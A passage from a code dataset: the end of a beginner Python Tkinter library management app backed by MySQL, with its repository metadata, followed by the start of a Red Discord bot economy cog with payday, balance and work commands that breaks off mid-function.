column=1)\r\n\r\n lblMobileNo = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Mobile \", padx=2, pady=6)\r\n lblMobileNo.grid(row=8, column=0, sticky=W)\r\n txtMobileNo = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.mobile, width=35)\r\n txtMobileNo.grid(row=8, column=1)\r\n\r\n lblBookId = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Book Id \", padx=2)\r\n lblBookId.grid(row=0, column=2, sticky=W)\r\n txtBookId = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.bookid, width=35)\r\n txtBookId.grid(row=0, column=3)\r\n\r\n lblBookTittle = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Book Tittle \", padx=2, pady=6)\r\n lblBookTittle.grid(row=1, column=2, sticky=W)\r\n txtBookTittle = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.booktittle, width=35)\r\n txtBookTittle.grid(row=1, column=3)\r\n\r\n lblAuthorName = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Author \", padx=2, pady=6)\r\n lblAuthorName.grid(row=2, column=2, sticky=W)\r\n txtAuthorName = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.author, width=35)\r\n txtAuthorName.grid(row=2, column=3)\r\n\r\n lblDateOfBorrowed = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Date Borrowed \", padx=2, pady=6)\r\n lblDateOfBorrowed.grid(row=3, column=2, sticky=W)\r\n txtDateOfBorrowed = Entry(\r\n DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.dateborrowed, width=35)\r\n txtDateOfBorrowed.grid(row=3, column=3)\r\n\r\n lblDateDue = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Date Due \", padx=2, pady=6)\r\n lblDateDue.grid(row=4, column=2, sticky=W)\r\n txtDateDue = Entry(DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.datedue, width=35)\r\n txtDateDue.grid(row=4, column=3)\r\n\r\n lblDaysOnBook = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Days On Book \", padx=2, pady=6)\r\n lblDaysOnBook.grid(row=5, column=2, sticky=W)\r\n txtDaysOnBook = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.daysonbook, width=35)\r\n txtDaysOnBook.grid(row=5, column=3)\r\n\r\n lblLateReturnFine = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Late Return Fine\", padx=2, pady=6)\r\n lblLateReturnFine.grid(row=6, column=2, sticky=W)\r\n txtLateReturnFine = Entry(\r\n DataFrameLeft, font=(\"arial\", 13, \"bold\"),textvariable=self.latefine, width=35)\r\n txtLateReturnFine.grid(row=6, column=3)\r\n\r\n lblDateOverDue = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"),text=\"Date Over Due \", padx=2, pady=6)\r\n lblDateOverDue.grid(row=7, column=2, sticky=W)\r\n txtDateOverDue = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.dateoverdue, width=35)\r\n txtDateOverDue.grid(row=7, column=3)\r\n\r\n lblActualPrice = Label(DataFrameLeft, font=(\r\n \"arial\", 12, \"bold\"), text=\"Actual Price \", padx=2, pady=6)\r\n lblActualPrice.grid(row=8, column=2, sticky=W)\r\n txtActualPrice = Entry(DataFrameLeft, font=(\r\n \"arial\", 13, \"bold\"),textvariable=self.finalprice, width=35)\r\n txtActualPrice.grid(row=8, column=3)\r\n \r\n \r\n\r\n # =================Data Frame Right===========================\r\n \r\n \r\n\r\n self.txtBox = Text(DataFrameRight, font=(\"arial\",13,\"bold\"), width=32, height=16)\r\n self.txtBox.grid(row=0, column=2,padx=2)\r\n \r\n listScrollBar = Scrollbar(DataFrameRight) \r\n listScrollBar.grid(row=0,column=1,sticky=\"ns\")\r\n\r\n listBooks = [\"Web Development\", \"Python\", \"Machine Learning\", \"Deep Learning\", \r\n \"Ethical Hacking\", \"Java\", \"C/C++\", \"JavaScript\",\r\n \"The Richest Engineer\",\"Software Engineering\",\"Python Advance\",\r\n \"Statics\",\"Let's Code\",\"Crack Code\",\"The Adavnce Machine Learning\",\r\n \"Artificial Intelligence\",\"Big Data\",\"Probability\",\"Data Science\",\"HTML\",\"CSS\",\"The Ghost\"]\r\n \r\n \r\n def SelectBook(event=\"\"):\r\n value=str(listBox.get(listBox.curselection()))\r\n x=value\r\n d1=datetime.datetime.today()\r\n d2=datetime.timedelta(days=15)\r\n d3=d1+d2\r\n self.dateborrowed.set(d1)\r\n self.datedue.set(d3)\r\n self.daysonbook.set(15)\r\n self.latefine.set(50)\r\n self.dateoverdue.set(\"NO\")\r\n \r\n if (x==\"Web Development\"):\r\n self.bookid.set(1123)\r\n self.booktittle.set(\"Make Web\")\r\n self.author.set(\"James\")\r\n self.finalprice.set(890)\r\n \r\n \r\n \r\n elif (x==\"Python\"):\r\n self.bookid.set(1124)\r\n self.booktittle.set(\"To build an AI\")\r\n self.author.set(\"Andy Smith\")\r\n self.finalprice.set(670)\r\n \r\n \r\n \r\n elif (x==\"Machine Learning\"):\r\n self.bookid.set(1125)\r\n self.booktittle.set(\"Human and Machine\")\r\n self.author.set(\"JJ Thomson\")\r\n self.finalprice.set(550)\r\n \r\n elif (x==\"Deep Learning\"):\r\n self.bookid.set(1126)\r\n self.booktittle.set(\"To build an AI\")\r\n self.author.set(\"Kris Starlet\")\r\n self.finalprice.set(400)\r\n \r\n elif (x==\"Ethical Hacking\"):\r\n self.bookid.set(1127)\r\n self.booktittle.set(\"Hack the Code\")\r\n self.author.set(\"Downey A\")\r\n self.finalprice.set(720)\r\n \r\n elif (x==\"Java\"):\r\n self.bookid.set(11281)\r\n self.booktittle.set(\"Java Core\")\r\n self.author.set(\"Mathew\")\r\n self.finalprice.set(989)\r\n \r\n elif (x==\"C/C++\"):\r\n self.bookid.set(11249)\r\n self.booktittle.set(\"Basic Computer Language\")\r\n self.author.set(\"MK Jordan\")\r\n self.finalprice.set(1050)\r\n \r\n elif (x==\"JavaScript\"):\r\n self.bookid.set(42347)\r\n self.booktittle.set(\"Java Script\")\r\n self.author.set(\"ST Clerk\")\r\n self.finalprice.set(1670)\r\n \r\n elif (x==\"The Richest Engineer\"):\r\n self.bookid.set(85846)\r\n self.booktittle.set(\"To become a rich coder\")\r\n self.author.set(\"Albert Rey\")\r\n self.finalprice.set(850)\r\n \r\n elif (x==\"Software Engineering\"):\r\n self.bookid.set(93646)\r\n self.booktittle.set(\"System Software \")\r\n self.author.set(\"Frankin Steve\")\r\n self.finalprice.set(2340)\r\n \r\n elif (x==\"Python Advance\"):\r\n self.bookid.set(65837)\r\n self.booktittle.set(\"Python Programming\")\r\n self.author.set(\"Ronny Bitz\")\r\n self.finalprice.set(170)\r\n \r\n elif (x==\"Statics\"):\r\n self.bookid.set(47576)\r\n self.booktittle.set(\"Statics\")\r\n self.author.set(\"Sweezy Smith\")\r\n self.finalprice.set(600)\r\n \r\n elif (x==\"Let's Code\"):\r\n self.bookid.set(38723)\r\n self.booktittle.set(\"Solve the code\")\r\n self.author.set(\"Deniel Paul\")\r\n self.finalprice.set(730)\r\n \r\n elif (x==\"Crack Code\"):\r\n self.bookid.set(67473)\r\n self.booktittle.set(\"Learn Coding easily\")\r\n self.author.set(\"Caten George\")\r\n self.finalprice.set(1240)\r\n \r\n elif (x==\"The Adavnce Machine Learning\"):\r\n self.bookid.set(12378)\r\n self.booktittle.set(\"Machine Learning\")\r\n self.author.set(\"Robert Alex\")\r\n self.finalprice.set(1770)\r\n \r\n elif (x==\"Airtificial Intelligence\"):\r\n self.bookid.set(19723)\r\n self.booktittle.set(\"How to make human robot\")\r\n self.author.set(\"Andrew Paul\")\r\n self.finalprice.set(610)\r\n \r\n elif (x==\"Big Data\"):\r\n self.bookid.set(23789)\r\n self.booktittle.set(\"Large Data\")\r\n self.author.set(\"Rushkin Bond\")\r\n self.finalprice.set(2149)\r\n \r\n elif (x==\"Probability\"):\r\n self.bookid.set(65789)\r\n self.booktittle.set(\"advance maths\")\r\n self.author.set(\"Preeti Shenoy\")\r\n self.finalprice.set(950)\r\n \r\n elif (x==\"Data Science\"):\r\n self.bookid.set(45856)\r\n self.booktittle.set(\"To Grow Business\")\r\n self.author.set(\"Shasi Tharoor\")\r\n self.finalprice.set(2550)\r\n \r\n elif (x==\"HTML\"):\r\n self.bookid.set(86342)\r\n self.booktittle.set(\"Structure of web\")\r\n self.author.set(\"Roger Faligot\")\r\n self.finalprice.set(640)\r\n \r\n elif (x==\"CSS\"):\r\n self.bookid.set(16487)\r\n self.booktittle.set(\"Beauty of Website\")\r\n self.author.set(\"Usha Uthup\")\r\n self.finalprice.set(570)\r\n \r\n else:\r\n self.bookid.set(364087)\r\n self.booktittle.set(\"The Ghost\")\r\n self.author.set(\"Richa Misra\")\r\n self.finalprice.set(780)\r\n \r\n \r\n \r\n listBox =Listbox(DataFrameRight,font=(\"arial\" ,12,\"bold\"),width=20,height=15)\r\n listBox.bind(\"<>\",SelectBook) \r\n listBox.grid(row=0,column=0,padx=2)\r\n \r\n listScrollBar.config(command=listBox.yview)\r\n \r\n for item in listBooks:\r\n listBox.insert(END,item)\r\n \r\n \r\n\r\n # =================Buttons===========================\r\n\r\n btnAddData = Button(ButtonFrame,command=self.Add_data, text=\"Add Data\", bg=\"Blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnAddData.grid(row=0, column=0)\r\n\r\n btnShowData = Button(ButtonFrame,command=self.show_data, text=\"Show Data\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnShowData.grid(row=0, column=1)\r\n\r\n btnUpdate = Button(ButtonFrame,command=self.update, text=\"Update\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnUpdate.grid(row=0, column=2)\r\n\r\n btnDelete = Button(ButtonFrame,command=self.delete, text=\"Delete\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnDelete.grid(row=0, column=3)\r\n\r\n btnClear = Button(ButtonFrame, command=self.clear, text=\"Clear\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnClear.grid(row=0, column=4)\r\n\r\n btnExit = Button(ButtonFrame,command=self.exit, text=\"Exit\", bg=\"blue\", fg=\"white\", font=(\r\n \"arial\", 13, \"bold\"), width=23, padx=2, pady=6)\r\n btnExit.grid(row=0, column=5)\r\n \r\n \r\n \r\n #======================Table of Information Frame===================\r\n #======================scrollbar===============\r\n \r\n Table_frame= Frame(DetailsFrame,bd=6, relief= RIDGE, bg=\"powder blue\")\r\n Table_frame.place(x=0,y=2,width=1470,height=150)\r\n \r\n \r\n\r\n scroll_x=ttk.Scrollbar(Table_frame,orient=HORIZONTAL)\r\n scroll_y=ttk.Scrollbar(Table_frame,orient=VERTICAL)\r\n \r\n self.library_table = ttk.Treeview(Table_frame,column=(\"membertype\",\"prn\",\"idno\",\"firstname\",\"lastname\",\r\n \"adress1\",\"adress2\",\"postcode\",\"mobile\",\"bookid\",\"booktittle\",\"author\",\"dateborrowed\",\r\n \"datedue\",\"days\",\"latereturnfine\",\"dateoverdue\",\"finalprice\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n scroll_x.pack(side=BOTTOM , fill=X)\r\n scroll_y.pack(side=RIGHT,fill=Y)\r\n\r\n scroll_x.config(command=self.library_table.xview)\r\n scroll_y.config(command=self.library_table.yview)\r\n\r\n self.library_table.heading(\"membertype\",text=\"Member \")\r\n self.library_table.heading(\"prn\",text=\"Reg Number\")\r\n self.library_table.heading(\"idno\",text=\"Id Number\")\r\n self.library_table.heading(\"firstname\",text=\"First Name\")\r\n self.library_table.heading(\"lastname\",text=\"Last Name\")\r\n self.library_table.heading(\"adress1\",text=\"Adress1\")\r\n self.library_table.heading(\"adress2\",text=\"Adress2\")\r\n self.library_table.heading(\"postcode\",text=\"Post Code\")\r\n self.library_table.heading(\"mobile\",text=\"Mobile\")\r\n self.library_table.heading(\"bookid\",text=\"Book Id\")\r\n self.library_table.heading(\"booktittle\",text=\"Book Tittle\")\r\n self.library_table.heading(\"author\",text=\"Author\")\r\n self.library_table.heading(\"dateborrowed\",text=\"Date of Borrowed\")\r\n self.library_table.heading(\"datedue\",text=\"Date Due\")\r\n self.library_table.heading(\"days\",text=\"Days on Book\")\r\n self.library_table.heading(\"latereturnfine\",text=\"Late Return Fine\")\r\n self.library_table.heading(\"dateoverdue\",text=\"Date Over Due\")\r\n self.library_table.heading(\"finalprice\",text=\"Actual Price\") \r\n\r\n self.library_table[\"show\"]=\"headings\"\r\n\r\n self.library_table.column(\"membertype\",width=100)\r\n self.library_table.column(\"prn\",width=100)\r\n self.library_table.column(\"idno\",width=100)\r\n self.library_table.column(\"firstname\",width=100)\r\n self.library_table.column(\"lastname\",width=100)\r\n self.library_table.column(\"adress1\",width=100)\r\n self.library_table.column(\"adress2\",width=100)\r\n self.library_table.column(\"postcode\",width=100)\r\n self.library_table.column(\"mobile\",width=100)\r\n self.library_table.column(\"bookid\",width=100)\r\n self.library_table.column(\"booktittle\",width=100)\r\n self.library_table.column(\"author\",width=100)\r\n self.library_table.column(\"dateborrowed\",width=100)\r\n self.library_table.column(\"datedue\",width=100)\r\n self.library_table.column(\"days\",width=100)\r\n self.library_table.column(\"latereturnfine\",width=100)\r\n self.library_table.column(\"dateoverdue\",width=100)\r\n self.library_table.column(\"finalprice\",width=100) \r\n\r\n self.library_table.pack(fill=BOTH,expand=1)\r\n self.fetch_data()\r\n self.library_table.bind(\"\", self.get_cursor)\r\n \r\n def Add_data(self):\r\n conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"insert into library values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",(\r\n \r\n self.member.get(),\r\n self.prn.get(),\r\n self.id.get(),\r\n self.firstname.get(),\r\n self.lastname.get(),\r\n self.adress1.get(),\r\n self.adress2.get(),\r\n self.postcode.get(),\r\n self.mobile.get(),\r\n self.bookid.get(),\r\n self.booktittle.get(),\r\n self.author.get(),\r\n self.dateborrowed.get(),\r\n self.datedue.get(),\r\n self.daysonbook.get(),\r\n self.latefine.get(),\r\n self.dateoverdue.get(),\r\n self.finalprice.get() \r\n ))\r\n \r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n \r\n messagebox.showinfo(\"Success\",\"Member has been inserted successfully\")\r\n \r\n def fetch_data(self):\r\n conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from library\")\r\n rows=my_cursor.fetchall()\r\n\r\n if len(rows)!=0:\r\n self.library_table.delete(*self.library_table.get_children())\r\n for i in rows:\r\n self.library_table.insert(\"\",END,values=i)\r\n\r\n conn.commit()\r\n conn.close()\r\n \r\n def get_cursor(self,event=\"\"):\r\n cursor_row = self.library_table.focus()\r\n content = self.library_table.item(cursor_row)\r\n row=content[\"values\"]\r\n\r\n self.member.set(row[0]),\r\n self.prn.set(row[1]),\r\n self.id.set(row[2]),\r\n \r\n self.firstname.set(row[3]),\r\n self.lastname.set(row[4]),\r\n self.adress1.set(row[5]),\r\n self.adress2.set(row[6]),\r\n self.postcode.set(row[7]),\r\n self.mobile.set(row[8]),\r\n self.bookid.set(row[9]),\r\n self.booktittle.set(row[10]),\r\n self.author.set(row[11]),\r\n self.dateborrowed.set(row[12]),\r\n self.datedue.set(row[13]),\r\n self.daysonbook.set(row[14]),\r\n self.latefine.set(row[15]),\r\n self.dateoverdue.set(row[16]),\r\n self.finalprice.set(row[17])\r\n \r\n def show_data(self):\r\n self.txtBox.insert(END,\"Member\\t\\t \" + self.member.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Reg Number\\t\\t \" + self.prn.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Id Number\\t\\t \" + self.id.get() + \"\\n\")\r\n self.txtBox.insert(END,\"First Name\\t\\t \" + self.firstname.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Last Name\\t\\t \" + self.lastname.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Adress1\\t\\t \" + self.adress1.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Adress2\\t\\t \" + self.adress2.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Post Code\\t\\t \" + self.postcode.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Moblie\\t\\t \" + self.mobile.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Book Id\\t\\t \" + self.bookid.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Book Tittle\\t\\t \" + self.booktittle.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Author\\t\\t \" + self.author.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Date of Borrowed\\t\\t \" + self.dateborrowed.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Date Due\\t\\t \" + self.datedue.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Days on Book\\t\\t \" + self.daysonbook.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Late Return Fine\\t\\t \" + self.latefine.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Date Over Due\\t\\t \" + self.dateoverdue.get() + \"\\n\")\r\n self.txtBox.insert(END,\"Actual Price\\t\\t \" + self.finalprice.get() + \"\\n\")\r\n \r\n \r\n def clear(self):\r\n self.member.set(\"\"),\r\n self.prn.set(\"\"),\r\n self.id.set(\"\"),\r\n self.firstname.set(\"\"),\r\n self.lastname.set(\"\"),\r\n self.adress1.set(\"\"),\r\n self.adress2.set(\"\"),\r\n self.postcode.set(\"\"),\r\n self.mobile.set(\"\"),\r\n self.bookid.set(\"\"),\r\n self.booktittle.set(\"\"),\r\n self.author.set(\"\"),\r\n self.dateborrowed.set(\"\"),\r\n self.datedue.set(\"\"),\r\n self.daysonbook.set(\"\"),\r\n self.latefine.set(\"\"),\r\n self.dateoverdue.set(\"\"),\r\n self.finalprice.set(\"\") \r\n \r\n self.txtBox.delete(\"1.0\",END)\r\n \r\n def delete(self):\r\n if self.prn.get()==\"\" or self.id.get()==\"\":\r\n messagebox.showerror(\"Error\",\"Select the member\")\r\n\r\n else:\r\n conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n my_cursor=conn.cursor()\r\n query=\"DELETE FROM library WHERE ID= %d\"\r\n value=(self.prn.get())\r\n my_cursor.execute(query,value)\r\n\r\n conn.commit()\r\n self.fetch_data()\r\n self.clear()\r\n conn.close()\r\n \r\n messagebox.showinfo(\"Success\",\"Member has been deleted\")\r\n \r\n \r\n def update(self):\r\n conn=mysql.connector.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"librarydata\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"UPDATE library SET Member=%s, ID =%d,FirstName=%s,LAstName=%s,Adress1=%s,Adress2=%s,PostCode=%d,Mobile=%d,Book_Id=%d,Book_Tittle=%s,Author=%s,Date_Borrowed=%s,Date_Due=%s,Days_On_Book=%d,Late_Return_fee=%f,DateOverDue=%s,Final_Price=%f WHERE PRN_No=%d\"(\r\n self.member.get(),\r\n self.id.get(),\r\n self.firstname.get(),\r\n self.lastname.get(),\r\n self.adress1.get(),\r\n self.adress2.get(),\r\n self.postcode.get(),\r\n self.mobile.get(),\r\n self.bookid.get(),\r\n self.booktittle.get(),\r\n self.author.get(),\r\n self.dateborrowed.get(),\r\n self.datedue.get(),\r\n self.daysonbook.get(),\r\n self.latefine.get(),\r\n self.dateoverdue.get(),\r\n self.finalprice.get(),\r\n self.prn.get()\r\n ))\r\n \r\n conn.commit()\r\n self.fetch_data()\r\n self.clear()\r\n conn.close()\r\n\r\n messagebox.showinfo(\"Success\", \"Data has been updated successfully\")\r\n \r\n def exit(self):\r\n res=messagebox.askquestion('Exit Application', 'Do you really want to exit')\r\n if res == 'yes' :\r\n root.destroy()\r\n else :\r\n messagebox.showinfo('Return', 'Returning to main application')\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n root = Tk()\r\n obj = LibraryMangementSystem(root)\r\n root.mainloop()\r\n\r\n\r\n ", "repo_name": "mohdasif022/python-projects", "sub_path": "Library Management System/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 30709, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "tkinter.ttk.Combobox", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 79, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 222, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 222, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 223, "usage_type": "call"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 416, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 416, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scrollbar", "line_number": 417, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 417, "usage_type": "name"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 419, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 419, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 473, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 473, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 473, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 501, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 501, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 504, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 504, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 504, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 587, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 587, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 590, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 590, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 590, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 601, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 601, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 605, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 605, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 605, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 633, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 633, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askquestion", "line_number": 636, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 636, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 640, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 640, "usage_type": "name"}]} +{"seq_id": "9076437466", "text": "from typing import Literal, Optional\n\nimport discord\nfrom discord.ext.commands.core import cooldown\nfrom redbot.core import commands\nfrom redbot.core.bot import Red\nfrom redbot.core.config import Config\nimport datetime\nfrom redbot.core import bank\nfrom redbot.core.utils.chat_formatting import humanize_number\nimport random\n\nRequestType = Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"]\n\n_JOBS = [\n \"You work at McRonalds serving fries and gain {amount} {credit_name}.\",\n \"You work at McRonalds frying chicken and gain {amount} {credit_name}.\",\n \"You work at McRonalds serving burgers and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling phones and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling computers and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling monitors and gain {amount} {credit_name}.\",\n \"You work at Worst Buy selling keyboards and gain {amount} {credit_name}.\",\n \"You work at Alti selling blush and gain {amount} {credit_name}.\",\n \"You work at Alti selling lipstick and gain {amount} {credit_name}.\",\n \"You work at Alti selling eyeshadow and gain {amount} {credit_name}.\",\n \"You work with aikaterna on Audio and earn {amount} {credit_name} for dealing with Java.\",\n \"You work with Slime and get... slimed. Gain {amount} {credit_name} for having to deal with that.\",\n \"You host Red on Heroku and lose {amount}.\",\n \"You try to host Red on repl.it and lose {amount} {credit_name}.\",\n]\n\n\nclass AdvancedEconomy(commands.Cog):\n \"\"\"\n An advanced economy cog.\n \"\"\"\n\n __version__ = \"1.0.1\"\n\n def format_help_for_context(self, ctx):\n \"\"\"Thanks Sinbad!\"\"\"\n pre_processed = super().format_help_for_context(ctx)\n n = \"\\n\" if \"\\n\\n\" not in pre_processed else \"\"\n return f\"{pre_processed}{n}\\nCog Version: {self.__version__}\"\n\n def __init__(self, bot: Red) -> None:\n self.bot = bot\n self.config = Config.get_conf(\n self,\n identifier=572944636209922059,\n force_registration=True,\n )\n default_global = {\n \"default_payday\": 500,\n \"payday_cooldown\": 300,\n }\n default_user = {\n \"next_payday\": 0,\n }\n self.config.register_global(**default_global)\n self.config.register_user(**default_user)\n self.startup_task = self.bot.loop.create_task(self.startup())\n\n def cog_unload(self):\n self.startup_task.cancel()\n\n async def startup(self):\n await bank.set_global(True)\n\n async def red_delete_data_for_user(\n self, *, requester: RequestType, user_id: int\n ) -> None:\n # TODO: Replace this with the proper end user data removal handling.\n return\n\n @commands.group()\n @commands.guild_only()\n @commands.is_owner()\n async def economyset(self, ctx):\n \"\"\"\n Economy and bank settings\n \"\"\"\n pass\n\n @economyset.command()\n async def setpayday(self, ctx: commands.Context, amount: int) -> None:\n \"\"\"\n Set the default payday amount.\n\n Default: `500`\n \"\"\"\n # Add amount arg to config\n if amount <= 0:\n await ctx.send(\"This value can't be set below 0.\")\n else:\n await self.config.default_payday.set(amount)\n await ctx.tick()\n\n @economyset.command()\n async def setcooldown(self, ctx: commands.Context, cooldown: int):\n \"\"\"\n Set cooldown (in seconds)\n\n Default: `300`\n \"\"\"\n if cooldown <= 0:\n await ctx.send(\"This value can't be set below 0.\")\n else:\n await self.config.payday_cooldown.set(cooldown)\n await ctx.tick()\n\n @economyset.command()\n async def about(self, ctx):\n \"\"\"\n How to set other settings not found here\n \"\"\"\n embed = discord.Embed(title=\"AdvancedEconomy\")\n embed.add_field(\n name=\"How do I set more commands??\",\n value=\"More commands, such as setting the credit name, bank name, and setting t he maximum balance a user can have, are located in the Bank cog. Do not change the `bankset setglobal` value, as this will cause problems with AdvancedEconomy.\",\n inline=False,\n )\n embed.add_field(\n name=\"How do I get to the Bank cog?\",\n value=f\"You can load the Bank cog with `{ctx.prefix}load bank`. \",\n inline=False,\n )\n embed.set_footer(text=\"AdvancedEconomy\")\n await ctx.send(embed=embed)\n\n @commands.command()\n @commands.guild_only()\n async def payday(self, ctx: commands.Context):\n \"\"\"\n Get daily money\n \"\"\"\n if await self.config.user(\n ctx.author\n ).next_payday() == None or await self.config.user(\n ctx.author\n ).next_payday() <= int(\n datetime.datetime.now(datetime.timezone.utc).timestamp()\n ):\n currency = await self.config.default_payday()\n next_payday_config = await self.config.payday_cooldown()\n next_payday = (\n int(datetime.datetime.now(datetime.timezone.utc).timestamp())\n + next_payday_config\n )\n credit_name = await bank.get_currency_name()\n current_bal = await bank.get_balance(ctx.author)\n try:\n await bank.deposit_credits(amount=currency, member=ctx.author)\n except bank.errors.BalanceTooHigh as e:\n await bank.set_balance(ctx.author, e.max_balance)\n current_bal = await bank.get_balance(ctx.author)\n msg = (\n f\"You just earned {currency} {credit_name}!\\n\\n\"\n f\"You new balance is {humanize_number(current_bal)} {credit_name}\\n\\n\"\n f\"Come back to claim more money!\"\n )\n if await ctx.embed_requested():\n embed = discord.Embed(\n title=\"PAYDAY!! 🤑💰🤑\", color=await ctx.embed_color()\n )\n embed.add_field(\n name=\"It's time to get paid!\",\n value=msg,\n inline=False,\n )\n embed.set_footer(text=\"💸💸\")\n await ctx.send(embed=embed)\n else:\n await ctx.send(f\"**Payday!!**\\n\\n{msg}\")\n await self.config.user(ctx.author).next_payday.set(next_payday)\n return\n\n if await self.config.user(ctx.author).next_payday() >= int(\n datetime.datetime.now(datetime.timezone.utc).timestamp()\n ):\n currency = await self.config.default_payday()\n next_payday = await self.config.user(ctx.author).next_payday()\n current_bal = await bank.get_balance(ctx.author)\n await ctx.send(\n f\"Sorry, you can't redeem your payday yet! You can redeem your next payday .\"\n )\n\n @commands.command(aliases=[\"bal\"])\n @commands.guild_only()\n async def balance(self, ctx):\n \"\"\"\n Get your bank balance.\n \"\"\"\n current_bal = await bank.get_balance(ctx.author)\n credit_name = await bank.get_currency_name()\n await ctx.send(f\"{ctx.author.mention}, your balance is {humanize_number(current_bal)} \")\n\n @commands.command(aliases=[\"job\"])\n @commands.cooldown(1, 3600, commands.BucketType.user)\n @commands.guild_only()\n async def work(self, ctx):\n \"\"\"\n Work at a job and gain/lose some currency.\n \"\"\"\n _range = random.randint(10, 1000)\n random_index = random.choice(_JOBS)\n credit_name = await bank.get_currency_name()\n message = await ctx.send(\n random_index.format(amount=str(_range), credit_name=credit_name)\n )\n if \"lose\" in message.content:\n try:\n await 